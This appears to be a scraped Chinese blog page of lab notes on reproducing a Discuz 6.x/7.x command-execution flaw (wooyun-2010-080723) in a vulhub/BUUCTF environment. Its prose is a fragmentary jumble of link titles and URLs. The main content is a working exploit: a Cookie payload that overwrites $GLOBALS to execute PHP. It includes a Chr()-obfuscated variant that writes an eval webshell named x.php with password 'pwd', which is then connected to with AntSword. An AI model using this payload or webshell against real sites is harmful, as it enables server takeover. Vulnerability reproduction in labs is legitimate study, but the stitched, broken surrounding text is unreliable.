漏洞复现-Discuz-命令执行(wooyun-2010-080723) - 铺哩 - 博客园0x00 实验环境 攻击机:win10 靶机:Ubuntu18 (docker搭建的vulhub靶场) 0x01 影响版本 Discuz 7.x 6.x版本 0x02 实验目的 学习discuz的部分https://www.cnblogs.com/cute-puli/p/13333991.htmlbuuctf [Discuz]wooyun-2010-080723_Fatesec的博客-CSDN博客漏洞描述由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。https://www.secpulse.com/archives/2338.htmlhttps://www.freebuf.com/articles/web/226207.html漏洞复现http://node3.buuoj.cn:28226/install/来安装dihttps://blog.csdn.net/qq_36241198/article/details/115151040Chr(39)是什么意思_百度知道https://zhidao.baidu.com/question/6807826.html漏洞复现-Discuz-命令执行(wooyun-2010-080723)https://www.bbsmax.com/A/gVdnexpX5W/
# EXP
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(120).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(112).Chr(119).Chr(100).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59))
在上述代码中,文件为:x.php 密码为: pwd
然后我们访问http://[IP]:[Port]/x.php,连上写入的马,使用蚁剑连接成功,这样就getshell了: